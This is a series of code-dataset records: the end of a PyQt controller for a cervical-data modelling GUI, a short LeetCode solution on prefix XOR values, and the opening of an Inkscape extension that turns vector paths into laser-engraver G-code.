TODO\n acq_controller.display_models(get_coord(os.path.join(self.directory_path,\n acq_controller.curves_on_graph[0])))\n\n else: # The user cancel his operation\n pass\n\n @pyqtSlot(name=\"load_files_model_handler\")\n def create_model_handler(self):\n \"\"\"\n Handler called when the regenerate model menu is triggered\n It opens the model_generator_dialog and allow the user to select the profile he wants to use to\n generate the the model\n According to them it regenerates the model\n :return: Nothing\n \"\"\"\n DEBUG and print('LOAD FILES' + self.directory_path)\n directories_for_model, model_name, accepted = ModelGeneratorDialog.get_result(self.directory_path)\n\n # The user choose some directories\n if accepted:\n # Replace all spaces by underscores to avoid path problems\n model_name = model_name.replace(\" \", \"_\")\n\n DEBUG and print(\"=== my_window_controller.py === selected directories: \" + str(directories_for_model))\n DEBUG and print(\"=== my_window_controller.py === model name: \" + str(model_name))\n\n if len(directories_for_model) == 0:\n DEBUG and print(\"=== my_window_controller.py === None patient selected, clearing the graph\")\n self.view.tab_hull_and_splines.clear_graph()\n self.view.tab_hulls.clear_graph()\n self.view.tab_wavelet.clear_graph()\n else:\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n msg.setText(\"Création des modèles en cours\")\n msg.setInformativeText(\"La création des modèles peut prendre un peu de temps, veuillez patienter\")\n msg.setWindowTitle(\"Information\")\n msg.exec()\n\n abs_path = os.path.abspath(PATH_TO_STORE_MODELS)\n if not os.path.isdir(abs_path):\n os.makedirs(abs_path)\n\n directories_for_model = [PATH_TO_STORE_FILES + d for d in directories_for_model]\n\n path_hulls = PATH_TO_STORE_MODELS + model_name + '_hull' + EXTENSION_HULLS_MODEL\n hulls.save_model(directories_for_model, path_hulls)\n\n path_hull_and_spline = PATH_TO_STORE_MODELS + model_name + '_hull_and_spline' + \\\n EXTENSION_HULLS_SPLINES_MODEL\n hull_and_spline.save_model(directories_for_model, path_hull_and_spline)\n\n path_wavelet = PATH_TO_STORE_MODELS + model_name + '_time_series' + EXTENSION_WAVELET_MODEL\n plot_time.save_model(directories_for_model, path_wavelet)\n\n confirmation_msg = \"La création des modèles est terminée, voulez vous les charger maintenant ?\"\n reply = QMessageBox.question(self.view, 'Création des modèles terminée !',\n 
confirmation_msg, QMessageBox.Yes, QMessageBox.No)\n                if reply == QMessageBox.Yes:\n                    self.path_model_hulls = path_hulls\n                    self.path_model_wavelet = path_wavelet\n                    self.path_model_hull_and_spline = path_hull_and_spline\n                    acq_controller = self.view.tab_acquisition.acquisition_controller\n                    # TODO\n                    acq_controller.display_models(get_coord(os.path.join(self.directory_path,\n                                                                         acq_controller.curves_on_graph[0])))\n                else:\n                    # Do nothing\n                    pass\n\n        else: # The user canceled his operation\n            pass\n\n    @pyqtSlot(name=\"load_model_menu_handler\")\n    def load_model_handler(self):\n        \"\"\"\n        Handler called when the load model menu is triggered\n        It opens a browse directory dialog and allows the user to select a file\n        If the file selected does not match the pattern we want, we display an error\n        :return: Nothing\n        \"\"\"\n        my_filter = \"Model file (*\" + EXTENSION_HULLS_SPLINES_MODEL + \" *\" + EXTENSION_HULLS_MODEL + \" *\" +\\\n                    EXTENSION_WAVELET_MODEL + \") ;; All files (*)\"\n\n        model_path, _ = QFileDialog.getOpenFileNames(self.view, caption=\"Sélectionner un modèle\",\n                                                     filter=my_filter, directory=PATH_TO_STORE_MODELS)\n        # If the user canceled\n        if not model_path:\n            return\n\n        nb_hulls_model = sum(1 for curr_path in model_path \\\n                             if os.path.splitext(curr_path)[1] == EXTENSION_HULLS_MODEL)\n\n        nb_hull_and_splines_model = sum(1 for curr_path in model_path \\\n                                        if os.path.splitext(curr_path)[1] == EXTENSION_HULLS_SPLINES_MODEL)\n\n        nb_wavelet_model = sum(1 for curr_path in model_path \\\n                               if os.path.splitext(curr_path)[1] == EXTENSION_WAVELET_MODEL)\n\n        informative_text = \"Vous avez sélectionné deux modèles du type TYPE. \\n\" +\\\n                           \"Veuillez faire attention à ne sélectionner qu'un seul modèle du type TYPE \" +\\\n                           \"(vérifiable grâce au nom du fichier ainsi qu'à son extension 'EXTENSION')\"\n\n        if nb_hulls_model > 1:\n            informative_text = informative_text.replace(\"TYPE\", \"Hulls\")\n            informative_text = informative_text.replace(\"EXTENSION\", EXTENSION_HULLS_MODEL)\n\n        if nb_hull_and_splines_model > 1:\n            informative_text = informative_text.replace(\"TYPE\", \"Hulls and Splines\")\n            informative_text = informative_text.replace(\"EXTENSION\", EXTENSION_HULLS_SPLINES_MODEL)\n\n        if nb_wavelet_model > 1:\n            informative_text = informative_text.replace(\"TYPE\", \"Wavelet\")\n            informative_text = informative_text.replace(\"EXTENSION\", EXTENSION_WAVELET_MODEL)\n\n        if nb_wavelet_model > 1 or nb_hull_and_splines_model > 1 or nb_hulls_model > 1:\n            msg = QMessageBox()\n            msg.setIcon(QMessageBox.Warning)\n            msg.setText(\"Modèles en conflits\")\n            msg.setInformativeText(informative_text)\n            msg.setWindowTitle(\"Attention\")\n            msg.exec()\n            return\n\n        # Go through each selected path\n        for path in model_path:\n\n            try:\n                _, file_extension = os.path.splitext(path)\n\n                # TODO INDICES OF CURVES\n                acquisition_tab_controller = self.view.tab_acquisition.acquisition_controller\n                if acquisition_tab_controller.view.has_been_drawn:\n                    coords = get_coord(os.path.join(self.directory_path, acquisition_tab_controller.curves_on_graph[0]))\n\n                if file_extension == EXTENSION_HULLS_MODEL:\n                    self.path_model_hulls = path\n                    if acquisition_tab_controller.view.has_been_drawn:\n                        acquisition_tab_controller.display_models(coords)\n\n                elif file_extension == EXTENSION_HULLS_SPLINES_MODEL:\n                    self.path_model_hull_and_spline = path\n                    if acquisition_tab_controller.view.has_been_drawn:\n                        acquisition_tab_controller.display_models(coords)\n\n                elif file_extension == EXTENSION_WAVELET_MODEL:\n                    self.path_model_wavelet = path\n                    if 
acquisition_tab_controller.view.has_been_drawn:\n                        acquisition_tab_controller.display_models(coords)\n\n            except ValueError:\n                # DISPLAY POP UP ERROR AND DO NOTHING\n                DEBUG and print(\"=== acquisition.py === INCORRECT FILE NAME\")\n                msg = QMessageBox()\n                msg.setIcon(QMessageBox.Critical)\n                msg.setText(\"Format de fichier incorrect\")\n                msg.setInformativeText(\"Le fichier que vous avez sélectionné ne correspond pas à un fichier modèle\")\n                msg.setWindowTitle(\"Erreur\")\n                msg.exec()\n                return\n\n        if len(model_path) > 1:\n            text = \"Les \" + str(len(model_path)) + \" modèles ont été chargés avec succès\"\n        else:\n            text = \"Le modèle a été chargé avec succès\"\n\n        msg = QMessageBox()\n        msg.setIcon(QMessageBox.Information)\n        msg.setText(text)\n        msg.setWindowTitle(\"Modèles chargés avec succès\")\n        msg.exec()\n        return\n\n    def one_model_loaded(self):\n        return self.path_model_hull_and_spline != \"\" or self.path_model_hulls != \"\" or self.path_model_wavelet != \"\"\n\n    def all_models_loaded(self):\n        return self.path_model_hull_and_spline != \"\" and self.path_model_hulls != \"\" and self.path_model_wavelet != \"\"\n\n    @pyqtSlot(name=\"user_guide_menu_handler\")\n    def user_guide_menu_handler(self):\n        \"\"\"\n        Handler called when the user guide menu is called\n        It opens a web browser to the link of our github project that contains the user guide\n        :return:\n        \"\"\"\n        DEBUG and print('=== my_window_controller.py === ABOUT USER GUIDE')\n        webbrowser.open(USER_GUIDE_GIT_LINK, new=2)\n\n    @pyqtSlot(name=\"technical_guide_menu_handler\")\n    def technical_guide_menu_handler(self):\n        \"\"\"\n        Handler called when the about menu is called\n        It opens a web browser to the link of our github project that contains the technical guide\n        :return:\n        \"\"\"\n        DEBUG and print('=== my_window_controller.py === ABOUT TECHNICAL GUIDE')\n        webbrowser.open(TECHNICAL_GUIDE_GIT_LINK, new=2)","sub_path":"Cervical_GUI/controller/my_window_controller.py","file_name":"my_window_controller.py","file_ext":"py","file_size_in_byte":18610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}{"seq_id":"260699507","text":"# 1738. Find Kth Largest XOR Coordinate Value\n# vwc 225.\n\n# 2021/05/12\n# Runtime: 3584 ms, faster than 82.74% of Python3 online submissions for Find Kth Largest XOR Coordinate Value.\n# Memory Usage: 52.2 MB, less than 25.22% of Python3 online submissions for Find Kth Largest XOR Coordinate Value.\n\n# Dynamic programming, similar to the 2D prefix-sum problem.\n# After computing the prefix-XOR matrix, sorting it yields the answer.\n# A min-heap could be used to optimize the sorting step.\n\nclass Solution:\n    def kthLargestValue(self, matrix: List[List[int]], k: int) -> int:\n        n, m = len(matrix), len(matrix[0])\n        xors = [ [0] * (1 + m) for _ in range(1 + n)]\n        ans = []\n        for i in range(n):\n            for j in range(m):\n                xors[i+1][j+1] = matrix[i][j] ^ xors[i][j+1] ^ xors[i+1][j] ^ xors[i][j]\n                ans.append(xors[i+1][j+1])\n        
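# Min-heap alternative as hinted above: heapq.nlargest(k, ans)[-1] would avoid the full sort (needs import heapq).\n        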
return sorted(ans, reverse = True)[k-1]","sub_path":"1738. Find Kth Largest XOR Coordinate Value.py","file_name":"1738. Find Kth Largest XOR Coordinate Value.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}{"seq_id":"635887822","text":"#!/usr/bin/env python\n\"\"\"\nModified by Jay Johnson 2015, J Tech Photonics, Inc., jtechphotonics.com\nmodified by Adam Polak 2014, polakiumengineering.org\n\nbased on Copyright (C) 2009 Nick Drobchenko, nick@cnc-club.ru\nbased on gcode.py (C) 2007 hugomatic...\nbased on addnodes.py (C) 2005,2007 Aaron Spike, aaron@ekips.org\nbased on dots.py (C) 2005 Aaron Spike, aaron@ekips.org\nbased on interp.py (C) 2005 Aaron Spike, aaron@ekips.org\nbased on bezmisc.py (C) 2005 Aaron Spike, aaron@ekips.org\nbased on cubicsuperpath.py (C) 2005 Aaron Spike, aaron@ekips.org\n\nThis program is free software; you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; either version 2 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, write to the Free Software\nFoundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\"\"\"\nimport inkex\nimport simpletransform\n\nimport os\nimport math\nimport bezmisc\nimport re\nimport sys\nimport time\nimport numpy\nimport gettext\n\n_ = gettext.gettext\n\n# Deprecation hack. Access the formatStyle differently for inkscape >= 1.0\ntarget_version = 1.0\n\nif target_version < 1.0:\n    # simplestyle\n    import simplestyle\n\n    # etree\n    etree = inkex.etree\n\n    # cubicsuperpath\n    import cubicsuperpath\n    parsePath = cubicsuperpath.parsePath\n\n    # Inkex.Boolean\n    inkex.Boolean = bool\n\nelse:\n    # simplestyle\n\n    # Class and method names follow the old Inkscape API for compatibility's sake.\n    # When support is dropped for older versions this can be changed to follow PEP 8.\n    class simplestyle(object): # noqa\n        # I think anonymous declarations would have been cleaner. However, Python 2 doesn't like how I use them\n        @staticmethod\n        def formatStyle(a): # noqa\n            return str(inkex.Style(a))\n\n        @staticmethod\n        def parseStyle(s): # noqa\n            return dict(inkex.Style.parse_str(s))\n\n    # etree\n    from lxml import etree # noqa\n\n    # cubicsuperpath\n    from inkex.paths import CubicSuperPath # noqa\n    parsePath = CubicSuperPath\n\n\n# Check if inkex has error messages. 
(0.46 version does not have one) Could be removed later.\nif \"errormsg\" not in dir(inkex):\n inkex.errormsg = lambda msg: sys.stderr.write((str(msg) + \"\\n\").encode(\"UTF-8\"))\n\n\ndef bezierslopeatt(xxx_todo_changeme, t):\n ((bx0, by0), (bx1, by1), (bx2, by2), (bx3, by3)) = xxx_todo_changeme\n ax, ay, bx, by, cx, cy, x0, y0 = bezmisc.bezierparameterize(((bx0, by0), (bx1, by1), (bx2, by2), (bx3, by3)))\n dx = 3 * ax * (t ** 2) + 2 * bx * t + cx\n dy = 3 * ay * (t ** 2) + 2 * by * t + cy\n if dx == dy == 0:\n dx = 6 * ax * t + 2 * bx\n dy = 6 * ay * t + 2 * by\n if dx == dy == 0:\n dx = 6 * ax\n dy = 6 * ay\n if dx == dy == 0:\n print_(\"Slope error x = %s*t^3+%s*t^2+%s*t+%s, y = %s*t^3+%s*t^2+%s*t+%s, t = %s, dx==dy==0\" % (\n ax, bx, cx, dx, ay, by, cy, dy, t))\n print_(((bx0, by0), (bx1, by1), (bx2, by2), (bx3, by3)))\n dx, dy = 1, 1\n\n return dx, dy\n\n\nbezmisc.bezierslopeatt = bezierslopeatt\n\n################################################################################\n#\n# Styles and additional parameters\n#\n################################################################################\n\nmath.pi2 = math.pi * 2\nstraight_tolerance = 0.0001\nstraight_distance_tolerance = 0.0001\nengraving_tolerance = 0.0001\nloft_lengths_tolerance = 0.0000001\noptions = {}\ndefaults = {\n 'header': \"\"\"\nG28\nG90\nG0 Z20\n\"\"\",\n 'footer': \"\"\"G0 Z20\nG28 X0 Y0\nM18\n\n\"\"\"\n}\n\nintersection_recursion_depth = 10\nintersection_tolerance = 0.00001\n\nstyles = {\n \"loft_style\": {\n 'main curve': simplestyle.formatStyle(\n {'stroke': '#88f', 'fill': 'none', 'stroke-width': '1', 'marker-end': 'url(#Arrow2Mend)'}),\n },\n \"biarc_style\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#88f', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#8f8', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#f88', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#777', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.1'}),\n },\n \"biarc_style_dark\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#33a', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#3a3', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#a33', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#222', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.3'}),\n },\n \"biarc_style_dark_area\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#33a', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.1'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#3a3', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.1'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#a33', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.1'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#222', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.3'}),\n },\n \"biarc_style_i\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#880', 'fill': 'none', \"marker-end\": 
\"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#808', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#088', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#999', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.3'}),\n },\n \"biarc_style_dark_i\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#dd5', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#d5d', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#5dd', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '1'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#aaa', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.3'}),\n },\n \"biarc_style_lathe_feed\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#07f', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#0f7', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#f44', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#aaa', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.3'}),\n },\n \"biarc_style_lathe_passing feed\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#07f', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#0f7', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#f44', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#aaa', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.3'}),\n },\n \"biarc_style_lathe_fine feed\": {\n 'biarc0': simplestyle.formatStyle(\n {'stroke': '#7f0', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'biarc1': simplestyle.formatStyle(\n {'stroke': '#f70', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'line': simplestyle.formatStyle(\n {'stroke': '#744', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '.4'}),\n 'area': simplestyle.formatStyle(\n {'stroke': '#aaa', 'fill': 'none', \"marker-end\": \"url(#DrawCurveMarker)\", 'stroke-width': '0.3'}),\n },\n \"area artefact\": simplestyle.formatStyle({'stroke': '#ff0000', 'fill': '#ffff00', 'stroke-width': '1'}),\n \"area artefact arrow\": simplestyle.formatStyle({'stroke': '#ff0000', 'fill': '#ffff00', 'stroke-width': '1'}),\n \"dxf_points\": simplestyle.formatStyle({\"stroke\": \"#ff0000\", \"fill\": \"#ff0000\"}),\n\n}\n\n\n################################################################################\n# Cubic Super Path additional functions\n################################################################################\n\ndef csp_segment_to_bez(sp1, sp2):\n return sp1[1:] + sp2[:2]\n\n\ndef csp_split(sp1, sp2, t=.5):\n [x1, y1], [x2, y2], [x3, y3], [x4, y4] = sp1[1], 
sp1[2], sp2[0], sp2[1]\n    x12 = x1 + (x2 - x1) * t\n    y12 = y1 + (y2 - y1) * t\n    x23 = x2 + (x3 - x2) * t\n    y23 = y2 + (y3 - y2) * t\n    x34 = x3 + (x4 - x3) * t\n    y34 = y3 + (y4 - y3) * t\n    x1223 = x12 + (x23 - x12) * t\n    y1223 = y12 + (y23 - y12) * t\n    x2334 = x23 + (x34 - x23) * t\n    y2334 = y23 + (y34 - y23) * t\n    x = x1223 + (x2334 - x1223) * t\n    y = y1223 + (y2334 - y1223) * t\n    return [sp1[0], sp1[1], [x12, y12]], [[x1223, y1223], [x, y], [x2334, y2334]], [[x34, y34], sp2[1], sp2[2]]\n\n\ndef csp_curvature_at_t(sp1, sp2, t, depth=3):\n    ax, ay, bx, by, cx, cy, dx, dy = bezmisc.bezierparameterize(csp_segment_to_bez(sp1, sp2))\n\n    # curvature = (x'y''-y'x'') / (x'^2+y'^2)^1.5\n\n    f1x = 3 * ax * t ** 2 + 2 * bx * t + cx\n    f1y = 3 * ay * t ** 2 + 2 * by * t + cy\n    f2x = 6 * ax * t + 2 * bx\n    f2y = 6 * ay * t + 2 * by\n    d = (f1x ** 2 + f1y ** 2) ** 1.5\n    if d != 0:\n        return (f1x * f2y - f1y * f2x) / d\n    else:\n        t1 = f1x * f2y - f1y * f2x\n        if t1 > 0: return 1e100\n        if t1 < 0: return -1e100\n        # Use L'Hôpital's rule to resolve the 0/0 problem, twice...\n        t1 = 2 * (bx * ay - ax * by) * t + (ay * cx - ax * cy)\n        if t1 > 0: return 1e100\n        if t1 < 0: return -1e100\n        t1 = bx * ay - ax * by\n        if t1 > 0: return 1e100\n        if t1 < 0: return -1e100\n        if depth > 0:\n            # little hack ;^) hope it won't influence anything...\n            return csp_curvature_at_t(sp1, sp2, t * 1.004, depth - 1)\n        return 1e100\n\n\ndef csp_at_t(sp1, sp2, t):\n    ax, bx, cx, dx = sp1[1][0], sp1[2][0], sp2[0][0], sp2[1][0]\n    ay, by, cy, dy = sp1[1][1], sp1[2][1], sp2[0][1], sp2[1][1]\n\n    x1, y1 = ax + (bx - ax) * t, ay + (by - ay) * t\n    x2, y2 = bx + (cx - bx) * t, by + (cy - by) * t\n    x3, y3 = cx + (dx - cx) * t, cy + (dy - cy) * t\n    x4, y4 = x1 + (x2 - x1) * t, y1 + (y2 - y1) * t\n    x5, y5 = x2 + (x3 - x2) * t, y2 + (y3 - y2) * t\n\n    x, y = x4 + (x5 - x4) * t, y4 + (y5 - y4) * t\n    return [x, y]\n\n\ndef cspseglength(sp1, sp2, tolerance=0.001):\n    bez = (sp1[1][:], sp1[2][:], sp2[0][:], sp2[1][:])\n    return bezmisc.bezierlength(bez, tolerance)\n\n\n# Distance calculation from point to arc\ndef point_to_arc_distance(p, arc):\n    P0, P2, c, a = arc\n    dist = None\n    p = P(p)\n    r = (P0 - c).mag()\n    if r > 0:\n        i = c + (p - c).unit() * r\n        alpha = ((i - c).angle() - (P0 - c).angle())\n        if a * alpha < 0:\n            if alpha > 0:\n                alpha = alpha - math.pi2\n            else:\n                alpha = math.pi2 + alpha\n        if between(alpha, 0, a) or min(abs(alpha), abs(alpha - a)) < straight_tolerance:\n            return (p - i).mag(), (i.x, i.y)\n        else:\n            d1, d2 = (p - P0).mag(), (p - P2).mag()\n            if d1 < d2:\n                return (d1, (P0.x, P0.y))\n            else:\n                return (d2, (P2.x, P2.y))\n\n\ndef csp_to_arc_distance(sp1, sp2, arc1, arc2, tolerance=0.01): # arc = [start,end,center,alpha]\n    n, i = 10, 0\n    d, d1, dl = (0, (0, 0)), (0, (0, 0)), 0\n    while i < 1 or (abs(d1[0] - dl[0]) > tolerance and i < 4):\n        i += 1\n        dl = d1 * 1\n        for j in range(n + 1):\n            t = float(j) / n\n            p = csp_at_t(sp1, sp2, t)\n            d = min(point_to_arc_distance(p, arc1), point_to_arc_distance(p, arc2))\n            # inkex.debug(\"---Debug---\")\n            # inkex.debug(str(d1) + str(d))\n            # inkex.debug(str(tuple(d1)) + str(tuple(d)))\n            d1 = max(tuple(d1), tuple(d))\n        n = n * 2\n    return d1[0]\n\n\n################################################################################\n# Common functions\n################################################################################\n\ndef atan2(*arg):\n    if len(arg) == 1 and (type(arg[0]) == type([0., 0.]) or type(arg[0]) == type((0., 0.))):\n        return (math.pi / 2 - math.atan2(arg[0][0], arg[0][1])) % math.pi2\n    elif len(arg) == 
2:\n\n        return (math.pi / 2 - math.atan2(arg[0], arg[1])) % math.pi2\n    else:\n        raise ValueError(\"Bad arguments for atan! (%s)\" % arg)\n\n\ndef between(c, x, y):\n    return x - straight_tolerance <= c <= y + straight_tolerance or y - straight_tolerance <= c <= x + straight_tolerance\n\n\n# Print arguments into specified log file\ndef print_(*arg):\n    f = open(options.log_filename, \"a\")\n    for s in arg:\n        s = str(str(s).encode('unicode_escape')) + \" \"\n        f.write(s)\n    f.write(\"\\n\")\n    f.close()\n\n\n################################################################################\n# Point (x,y) operations\n################################################################################\n\nclass P:\n    def __init__(self, x, y=None):\n        if not y == None:\n            self.x, self.y = float(x), float(y)\n        else:\n            self.x, self.y = float(x[0]), float(x[1])\n\n    def __add__(self, other):\n        return P(self.x + other.x, self.y + other.y)\n\n    def __sub__(self, other):\n        return P(self.x - other.x, self.y - other.y)\n\n    def __neg__(self):\n        return P(-self.x, -self.y)\n\n    def __mul__(self, other):\n        if isinstance(other, P):\n            return self.x * other.x + self.y * other.y\n        return P(self.x * other, self.y * other)\n\n    __rmul__ = __mul__\n\n    def __div__(self, other):\n        return P(self.x / other, self.y / other)\n\n    # Added to support python 3\n    __floordiv__ = __div__\n    __truediv__ = __div__\n\n    def mag(self):\n        return math.hypot(self.x, self.y)\n\n    def unit(self):\n        h = self.mag()\n        if h:\n            return self / h\n        else:\n            return P(0, 0)\n\n    def angle(self):\n        return math.atan2(self.y, self.x)\n\n    def __repr__(self):\n        return '%f,%f' % (self.x, self.y)\n\n    def l2(self):\n        return self.x * self.x + self.y * self.y\n\n\n################################################################################\n#\n# Biarc function\n#\n# Calculates biarc approximation of cubic super path segment\n# splits segment if needed or approximates it with straight line\n#\n################################################################################\ndef biarc(sp1, sp2, z1, z2, depth=0):\n    def biarc_split(sp1, sp2, z1, z2, depth):\n        if depth < options.biarc_max_split_depth:\n            sp1, sp2, sp3 = csp_split(sp1, sp2)\n            l1, l2 = cspseglength(sp1, sp2), cspseglength(sp2, sp3)\n            if l1 + l2 == 0:\n                zm = z1\n            else:\n                zm = z1 + (z2 - z1) * l1 / (l1 + l2)\n            return biarc(sp1, sp2, z1, zm, depth + 1) + biarc(sp2, sp3, zm, z2, depth + 1)\n        else:\n            return [[sp1[1], 'line', 0, 0, sp2[1], [z1, z2]]]\n\n    P0, P4 = P(sp1[1]), P(sp2[1])\n    TS, TE, v = (P(sp1[2]) - P0), -(P(sp2[0]) - P4), P0 - P4\n    tsa, tea, va = TS.angle(), TE.angle(), v.angle()\n    if TE.mag() < straight_distance_tolerance and TS.mag() < straight_distance_tolerance:\n        # Both tangents are zero - line straight\n        return [[sp1[1], 'line', 0, 0, sp2[1], [z1, z2]]]\n    if TE.mag() < straight_distance_tolerance:\n        TE = -(TS + v).unit()\n        r = TS.mag() / v.mag() * 2\n    elif TS.mag() < straight_distance_tolerance:\n        TS = -(TE + v).unit()\n        r = 1 / (TE.mag() / v.mag() * 2)\n    else:\n        r = TS.mag() / TE.mag()\n    TS, TE = TS.unit(), TE.unit()\n    tang_are_parallel = (\n            (tsa - tea) % math.pi < straight_tolerance or math.pi - (tsa - tea) % math.pi < straight_tolerance)\n    if (tang_are_parallel and\n            ((\n                     v.mag() < straight_distance_tolerance or TE.mag() < straight_distance_tolerance or TS.mag() < straight_distance_tolerance) or\n             1 - abs(TS * v / (TS.mag() * v.mag())) < straight_tolerance)):\n        # Both tangents are parallel and start and end are the same - line straight\n        # or one of the tangents is still smaller than the tolerance\n\n        # Both 
tangents and v are parallel - line straight\n        return [[sp1[1], 'line', 0, 0, sp2[1], [z1, z2]]]\n\n    c, b, a = v * v, 2 * v * (r * TS + TE), 2 * r * (TS * TE - 1)\n    if v.mag() == 0:\n        return biarc_split(sp1, sp2, z1, z2, depth)\n    asmall, bsmall, csmall = abs(a) < 10 ** -10, abs(b) < 10 ** -10, abs(c) < 10 ** -10\n    if asmall and b != 0:\n        beta = -c / b\n    elif csmall and a != 0:\n        beta = -b / a\n    elif not asmall:\n        discr = b * b - 4 * a * c\n        if discr < 0: raise ValueError(a, b, c, discr)\n        disq = discr ** .5\n        beta1 = (-b - disq) / 2 / a\n        beta2 = (-b + disq) / 2 / a\n        if beta1 * beta2 > 0: raise ValueError(a, b, c, disq, beta1, beta2)\n        beta = max(beta1, beta2)\n    elif asmall and bsmall:\n        return biarc_split(sp1, sp2, z1, z2, depth)\n    alpha = beta * r\n    ab = alpha + beta\n    P1 = P0 + alpha * TS\n    P3 = P4 - beta * TE\n    P2 = (beta / ab) * P1 + (alpha / ab) * P3\n\n\n    def calculate_arc_params(P0, P1, P2):\n        D = (P0 + P2) / 2\n        if (D - P1).mag() == 0: return None, None\n        R = D - ((D - P0).mag() ** 2 / (D - P1).mag()) * (P1 - D).unit()\n        p0a, p1a, p2a = (P0 - R).angle() % (2 * math.pi), (P1 - R).angle() % (2 * math.pi), (P2 - R).angle() % (\n                2 * math.pi)\n        alpha = (p2a - p0a) % (2 * math.pi)\n        if (p0a < p2a and (p1a < p0a or p2a < p1a)) or (p2a < p1a < p0a):\n            alpha = -2 * math.pi + alpha\n        if abs(R.x) > 1000000 or abs(R.y) > 1000000 or (R - P0).mag() < .1:\n            return None, None\n        else:\n            return R, alpha\n\n    R1, a1 = calculate_arc_params(P0, P1, P2)\n    R2, a2 = calculate_arc_params(P2, P3, P4)\n    if R1 == None or R2 == None or (R1 - P0).mag() < straight_tolerance or (\n            R2 - P2).mag() < straight_tolerance: return [[sp1[1], 'line', 0, 0, sp2[1], [z1, z2]]]\n\n    d = csp_to_arc_distance(sp1, sp2, [P0, P2, R1, a1], [P2, P4, R2, a2])\n    if d > 1 and depth < options.biarc_max_split_depth:\n        return biarc_split(sp1, sp2, z1, z2, depth)\n    else:\n        if R2.mag() * a2 == 0:\n            zm = z2\n        else:\n            zm = z1 + (z2 - z1) * (abs(R1.mag() * a1)) / (abs(R2.mag() * a2) + abs(R1.mag() * a1))\n        return [[sp1[1], 'arc', 